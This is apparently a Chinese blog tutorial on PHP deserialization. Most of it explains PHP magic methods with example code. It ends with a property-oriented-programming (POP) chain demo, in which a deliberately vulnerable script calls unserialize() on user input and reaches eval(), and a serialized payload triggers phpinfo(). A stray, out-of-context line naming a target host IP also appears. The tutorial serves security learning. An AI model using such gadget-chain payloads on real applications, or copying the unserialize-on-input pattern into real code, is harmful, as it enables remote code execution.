经验分享 | PHP-反序列化（超细的）（上）

Delina

原文链接：经验分享 | PHP-反序列化（超细的）
1.正文

常见的PHP魔术方法：

1. __construct：在创建对象时候初始化对象，一般用于对变量赋初值。
   
2. __destruct：和构造函数相反，当对象所在函数调用完毕后执行。
   
3. __call：当调用对象中不存在的方法会自动调用该方法。
   
4. __get()：获取对象不存在的属性时执行此函数。
   
5. __set()：设置对象不存在的属性时执行此函数。
   
6. __toString：当对象被当做一个字符串使用时调用。
   
7. __sleep：序列化对象之前就调用此方法(其返回需要一个数组)
   
8. __wakeup：反序列化恢复对象之前调用该方法
   
9. __isset()：在不可访问的属性上调用isset()或empty()触发
   
10. __unset()：在不可访问的属性上使用unset()时触发
    
11. __invoke() ：将对象当作函数来使用时执行此方法

复制代码

发现目标主机 192.168.64.137

__CONSTRUCT 与 __DESTRUCT

__construct：在创建对象时候初始化对象，一般用于对变量赋初值。 __destruct：和构造函数相反，当对象所在函数调用完毕后执行。

1. <?php
   
2. class Test{
   
3.     public $name;
   
4.     public $age;
   
5.     public $string;
   
6.     // __construct：实例化对象时被调用.其作用是拿来初始化一些值。
   
7.     public function __construct($name, $age, $string){
   
8.         echo "__construct 初始化"."<br>";
   
9.         $this->name = $name;
   
10.         $this->age = $age;
    
11.         $this->string = $string;
    
12.     }
    
13.     // __destruct：当删除一个对象或对象操作终止时被调用。其最主要的作用是拿来做垃圾回收机制。
    
14.     /*
    
15.      * 当对象销毁时会调用此方法
    
16.      * 一是用户主动销毁对象，二是当程序结束时由引擎自动销毁
    
17.      */
    
18.     function __destruct(){
    
19.        echo "__destruct 类执行完毕"."<br>";
    
20.     }
    
21. }
    
22. // 主动销毁
    
23. $test = new Test("Spaceman",566, 'Test String');
    
24. unset($test);
    
25. // 主动销毁先执行__destruct再执行下面的echo
    
26. echo '566'.'<br>';
    
27. echo '----------------------<br>';
    
28. // 程序结束自动销毁
    
29. $test = new test("Spaceman",566, 'Test String');
    
30. // 自动销毁先执行下面的echo，程序结束才执行__destruct
    
31. echo '666'.'<br>';
    
32. ?>
    
33. 运行结果：
    
34. __construct 初始化__destruct 类执行完毕566----------------------__construct 初始化666__destruct 类执行完毕

复制代码

__CALL

__call：当调用对象中不存在的方法会自动调用该方法。

调用某个方法， 若方法存在，则直接调用；若不存在，则会去调用__call函数。

例：

1. <?php
   
2. 
   
3. class Test{
   
4. 
   
5.     public function good($number,$string){
   
6.         echo '存在good方法'.'<br>';
   
7.         echo $number.'---------'.$string.'<br>';
   
8.     }
   
9. 
   
10.     // 当调用类中不存在的方法时，就会调用__call();
    
11.     public function __call($method,$args){
    
12.         echo '不存在'.$method.'方法'.'<br>';
    
13.         var_dump($args);
    
14.     }
    
15. }
    
16. 
    
17. $a = new Test();
    
18. $a->good(566,'nice');
    
19. $b = new Test();
    
20. $b->spaceman(899,'no');
    
21. ?>

复制代码

__GET()

__get()：访问不存在的成员变量时调用的；用来获取私有属性

读取一个对象的属性时，若属性存在，则直接返回属性值；若不存在，则会调用__get函数。

例：

1. <?php
   
2. 
   
3. class Test {
   
4.     public $n=123;
   
5. 
   
6.     // __get()：访问不存在的成员变量时调用
   
7.     public function __get($name){
   
8.         echo '__get 不存在成员变量'.$name.'<br>';
   
9.     }
   
10. }
    
11. 
    
12. $a = new Test();
    
13. // 存在成员变量n，所以不调用__get
    
14. echo $a->n;
    
15. echo '<br>';
    
16. // 不存在成员变量spaceman，所以调用__get
    
17. echo $a->spaceman;
    
18. 运行结果：
    
19. 123
    
20. __get 不存在成员变量spaceman

复制代码

__SET()

__set()：设置不存在的成员变量时调用的；

设置一个对象的属性时， 若属性存在，则直接赋值；若不存在，则会调用__set函数。

例：

1. <?php
   
2. 
   
3. class Test{
   
4.     public $data = 100;
   
5.     protected $noway=0;
   
6. 
   
7.     // __set()：设置对象不存在的属性或无法访问(私有)的属性时调用
   
8.     /* __set($name, $value)
   
9.      * 用来为私有成员属性设置的值
   
10.      * 第一个参数为你要为设置值的属性名，第二个参数是要给属性设置的值，没有返回值。
    
11.      */
    
12.     public function __set($name,$value){
    
13.         echo '__set 不存在成员变量 '.$name.'<br>';
    
14.         echo '即将设置的值 '.$value."<br>";
    
15.         $this->noway=$value;
    
16.     }
    
17. 
    
18.     public function Get(){
    
19.         echo $this->noway;
    
20.     }
    
21. }
    
22. 
    
23. $a = new Test();
    
24. // 读取 noway 的值，初始为0
    
25. $a->Get();
    
26. echo '<br>';
    
27. // 无法访问(私有)noway属性时调用，并设置值为899
    
28. $a->noway  = 899;
    
29. // 经过__set方法的设置noway的值为899
    
30. $a->Get();
    
31. echo '<br>';
    
32. // 设置对象不存在的属性spaceman
    
33. $a->spaceman = 566;
    
34. // 经过__set方法的设置noway的值为566
    
35. $a->Get();
    
36. ?>
    
37. 运行结果：
    
38. 0

复制代码

__set 不存在成员变量 noway
即将设置的值 899
899
__set 不存在成员变量 spaceman
即将设置的值 566
566

__get 与 __set

例：

1. <?php
   
2. 
   
3. class Person{
   
4.     private $name;
   
5.     private $sex;
   
6.     private $age;
   
7. 
   
8.     //__get()方法用来获取私有属性
   
9.     public function __get($property_name){
   
10.         echo "在直接获取私有属性值的时候，自动调用了这个__get()方法<br>";
    
11.         if(isset($this->$property_name)) {
    
12.             return($this->$property_name);
    
13.         }
    
14.         else {
    
15.             return(NULL);
    
16.         }
    
17.     }
    
18. 
    
19.     // __set()方法用来设置私有属性
    
20.     public function __set($property_name, $value){
    
21.         echo "在直接设置私有属性值的时候，自动调用了这个__set()方法为私有属性赋值<br>";
    
22.         $this->$property_name = $value;
    
23.     }
    
24. }
    
25. 
    
26. $a = new Person();
    
27. // 直接为私有属性赋值的操作，会自动调用__set()方法进行赋值
    
28. $a->name="张三";
    
29. $a->sex="男";
    
30. $a->age=20;
    
31. // 直接获取私有属性的值，会自动调用__get()方法，返回成员属性的值
    
32. echo "姓名：".$a->name."<br>";
    
33. echo "性别：".$a->sex."<br>";
    
34. echo "年龄：".$a->age."<br>";
    
35. ?>
    
36. 
    
37. 运行结果：
    
38. 在直接设置私有属性值的时候，自动调用了这个__set()方法为私有属性赋值
    
39. 在直接设置私有属性值的时候，自动调用了这个__set()方法为私有属性赋值
    
40. 在直接设置私有属性值的时候，自动调用了这个__set()方法为私有属性赋值
    
41. 在直接获取私有属性值的时候，自动调用了这个__get()方法
    
42. 姓名：张三
    
43. 在直接获取私有属性值的时候，自动调用了这个__get()方法
    
44. 性别：男
    
45. 在直接获取私有属性值的时候，自动调用了这个__get()方法
    
46. 年龄：20

复制代码

__TOSTRING()

__toString()：在对象当做字符串的时候会被调用。

例：

1. <?php
   
2. 
   
3. class Test
   
4. {
   
5.     public $variable = 'This is a string';
   
6. 
   
7.     public function good(){
   
8.         echo $this->variable . '<br />';
   
9.     }
   
10. 
    
11.     // 在对象当做字符串的时候会被调用
    
12.     public function __toString()
    
13. {
    
14.         return '__toString <br>';
    
15.     }
    
16. }
    
17. 
    
18. $a = new Test();
    
19. $a->good();
    
20. echo $a;
    
21. ?>
    
22. 
    
23. 运行结果：
    
24. This is a string
    
25. __toString

复制代码

__SLEEP()

__sleep()：serialize之前被调用，可以指定要序列化的对象属性。

例：

1. <?php
   
2. 
   
3. class Test{
   
4.     public $name;
   
5.     public $age;
   
6.     public $string;
   
7. 
   
8.     // __construct：实例化对象时被调用.其作用是拿来初始化一些值。
   
9.     public function __construct($name, $age, $string){
   
10.         echo "__construct 初始化"."<br>";
    
11.         $this->name = $name;
    
12.         $this->age = $age;
    
13.         $this->string = $string;
    
14.     }
    
15. 
    
16.     //  __sleep() ：serialize之前被调用，可以指定要序列化的对象属性
    
17.     public function __sleep(){
    
18.         echo "当在类外部使用serialize()时会调用这里的__sleep()方法<br>";
    
19.         // 例如指定只需要 name 和 age 进行序列化，必须返回一个数值
    
20.         return array('name', 'age');
    
21.     }
    
22. }
    
23. 
    
24. $a = new Test("Spaceman",566, 'Test String');
    
25. echo serialize($a);
    
26. ?>
    
27. 
    
28. 运行结果：
    
29. __construct 初始化
    
30. 当在类外部使用serialize()时会调用这里的__sleep()方法
    
31. O:4:"Test":2:{s:4:"name";s:8:"Spaceman";s:3:"age";i:566;}
    
32. 
    

复制代码

__WAKEUP

__wakeup：反序列化恢复对象之前调用该方法

例：

1. <?php
   
2. 
   
3. class Test{
   
4.     public $sex;
   
5.     public $name;
   
6.     public $age;
   
7. 
   
8.     public function __construct($name, $age, $sex){
   
9.         $this->name = $name;
   
10.         $this->age = $age;
    
11.         $this->sex = $sex;
    
12.     }
    
13. 
    
14.     public function __wakeup(){
    
15.         echo "当在类外部使用unserialize()时会调用这里的__wakeup()方法<br>";
    
16.         $this->age = 566;
    
17.     }
    
18. }
    
19. 
    
20. $person = new Test('spaceman',21,'男');
    
21. $a = serialize($person);
    
22. echo $a."<br>";
    
23. var_dump (unserialize($a));
    
24. ?>
    
25. 
    
26. 运行结果：
    
27. O:4:"Test":3:{s:3:"sex";s:3:"男";s:4:"name";s:8:"spaceman";s:3:"age";i:21;}
    
28. 当在类外部使用unserialize()时会调用这里的__wakeup()方法
    
29. class Test#2 (3) {
    
30.   public $sex =>
    
31.   string(3) "男"
    
32.   public $name =>
    
33.   string(8) "spaceman"
    
34.   public $age =>
    
35.   int(566)
    
36. }

复制代码

__ISSET()

__isset(): 检测对象的某个属性是否存在时执行此函数。

当对不可访问属性调用 isset() 或 empty() 时，__isset() 会被调用。

例：

1. <?php
   
2. 
   
3. class Person{
   
4.     public $sex;
   
5.     private $name;
   
6.     private $age;
   
7. 
   
8.     public function __construct($name, $age, $sex){
   
9.         $this->name = $name;
   
10.         $this->age = $age;
    
11.         $this->sex = $sex;
    
12.     }
    
13. 
    
14.     // __isset()：当对不可访问属性调用 isset() 或 empty() 时，__isset() 会被调用。
    
15.     public function __isset($content){
    
16.         echo "当在类外部使用isset()函数测定私有成员 {$content} 时，自动调用<br>";
    
17.         return isset($this->$content);
    
18.     }
    
19. }
    
20. 
    
21. $person = new Person("spaceman", 25,'男');
    
22. // public 成员
    
23. echo ($person->sex),"<br>";
    
24. // private 成员
    
25. echo isset($person->name);
    
26. ?>
    
27. 运行结果：
    
28. 
    
29. 男
    
30. 当在类外部使用isset()函数测定私有成员 name 时，自动调用
    
31. 1

复制代码

__UNSET()

__unset()：在不可访问的属性上使用unset()时触发

销毁对象的某个属性时执行此函数。

1、 如果一个对象里面的成员属性是公有的，就可以使用这个函数在对象外面删除对象的公有属性。

2、 如果对象的成员属性是私有的，我使用这个函数就没有权限去删除。

例：

1. <?php
   
2. 
   
3. class Person{
   
4.     public $sex;
   
5.     private $name;
   
6.     private $age;
   
7. 
   
8.     public function __construct($name, $age, $sex){
   
9.         $this->name = $name;
   
10.         $this->age = $age;
    
11.         $this->sex = $sex;
    
12.     }
    
13. 
    
14.     // __unset()：销毁对象的某个属性时执行此函数
    
15.     public function __unset($content) {
    
16.         echo "当在类外部使用unset()函数来删除私有成员时自动调用的<br>";
    
17.         echo isset($this->$content)."<br>";
    
18.     }
    
19. }
    
20. 
    
21. $person = new Person("spaceman", 21,"男"); // 初始赋值
    
22. unset($person->sex);
    
23. echo "666666<br>";
    
24. unset($person->name);
    
25. unset($person->age);
    
26. ?>
    
27. 运行结果：
    
28. 
    
29. 666666
    
30. 当在类外部使用unset()函数来删除私有成员时自动调用的
    
31. 1
    
32. 当在类外部使用unset()函数来删除私有成员时自动调用的
    
33. 1

复制代码

__INVOKE()
__INVOKE():将对象当做函数来使用时执行此方法，通常不推荐这样做。
例：

1. <?php
   
2. 
   
3. class Test{
   
4.     // _invoke()：以调用函数的方式调用一个对象时，__invoke() 方法会被自动调用
   
5.     public function __invoke($param1, $param2, $param3)
   
6. {
   
7.         echo "这是一个对象<br>";
   
8.         var_dump($param1,$param2,$param3);
   
9.     }
   
10. }
    
11. 
    
12. $a  = new Test();
    
13. $a('spaceman',21,'男');
    
14. ?>
    
15. 运行结果：
    
16. 
    
17. 这是一个对象
    
18. string(8) "spaceman"
    
19. int(21)
    
20. string(3) "男"

复制代码

举例pop链的利用例1：

1. <?php
   
2. 
   
3. highlight_file(__FILE__);
   
4. 
   
5. class pop {
   
6.     public $ClassObj;
   
7. 
   
8.     // 对象实例化时调用
   
9.     function __construct() {
   
10.         $this->ClassObj = new hello();
    
11.     }
    
12. 
    
13.     // 对象销毁或程序运行结束时调用
    
14.     function __destruct() {
    
15.         $this->ClassObj->action();
    
16.     }
    
17. }
    
18. 
    
19. class hello {
    
20.     function action() {
    
21.         echo "<br> hello pop ";
    
22.     }
    
23. }
    
24. 
    
25. class shell {
    
26.     public $data;
    
27.     function action() {
    
28.         eval($this->data);
    
29.     }
    
30. }
    
31. 
    
32. $a = new pop();
    
33. unserialize($_GET['s']);

复制代码

简单的审计一下，可以发现，pop类本来是调用hello类的，然后程序结束执行action方法，但是shell类也有action方法，所以就可以构造pop链，使其pop类调用shell类从而执行eval函数。

1. 构造如下：
   
2. <?php
   
3. 
   
4. highlight_file(__FILE__);
   
5. 
   
6. class pop {
   
7.     public $ClassObj;
   
8. 
   
9.     function __construct() {
   
10.         $this->ClassObj = new shell();
    
11.     }
    
12. }
    
13. 
    
14. class shell {
    
15.     public $data = "phpinfo();";
    
16.     function action() {
    
17.         eval($this->data);
    
18.     }
    
19. }
    
20. 
    
21. echo serialize(new pop());
    
22. 运行结果：
    
23. 
    
24. O:3:"pop":1:{s:8:"ClassObj";O:5:"shell":1:{s:4:"data";s:10:"phpinfo();";}}

复制代码

​
​

​
不过需要注意的是private属性和protected属性

1. <?php
   
2. 
   
3. highlight_file(__FILE__);
   
4. 
   
5. class pop {
   
6.   public $Pub = "spaceman";
   
7.   private $Pri = "good";
   
8.     protected $ClassObj;
   
9. 
   
10.     function __construct() {
    
11.         $this->ClassObj = new hello();
    
12.     }
    
13. 
    
14. }
    
15. 
    
16. class hello {
    
17. }
    
18. 
    
19. echo urlencode(serialize(new pop()));
    
20. 运行结果如下， 有%00存在是因为private属性和protected属性
    
21. 
    
22. O%3A3%3A%22pop%22%3A3%3A%7Bs%3A3%3A%22Pub%22%3Bs%3A8%3A%22spaceman%22%3Bs%3A8%3A%22%00pop%00Pri%22%3Bs%3A4%3A%22good%22%3Bs%3A11%3A%22%00%2A%00ClassObj%22%3BO%3A5%3A%22hello%22%3A0%3A%7B%7D%7D

复制代码